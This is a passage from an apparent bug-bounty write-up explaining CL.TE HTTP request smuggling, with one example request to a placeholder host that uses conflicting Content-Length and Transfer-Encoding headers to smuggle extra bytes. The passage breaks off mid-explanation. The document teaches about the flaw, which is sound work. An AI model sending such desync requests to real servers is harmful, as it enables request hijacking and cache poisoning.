This is a write-up of a security bug I found a few months ago - HTTP Request Smuggling (Type: CL.TE). This vulnerability occurs due to a disagreement between the front-end and back-end server on how to parse incoming HTTP request streams. CL.TE arises when the front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header to parse the incoming HTTP request, which causes a desynchronization. To get more in-depth understanding of the underlying concepts of this vulnerability, I suggest reading this for additional reference. Example: POST / HTTP/1.1 Host: test.com Content-Length: 12 Transfer-Encoding: chunked 0\r\n \r\n TESTING In the above example, the front-end server parses the Content-Length header (till the end of TESTING [12 bytes]. I have used \r\n for demonstrating why 12 bytes is the content length in this example. These bytes are not visible in the original request. Now, once this request is r...
Cyber Security Articles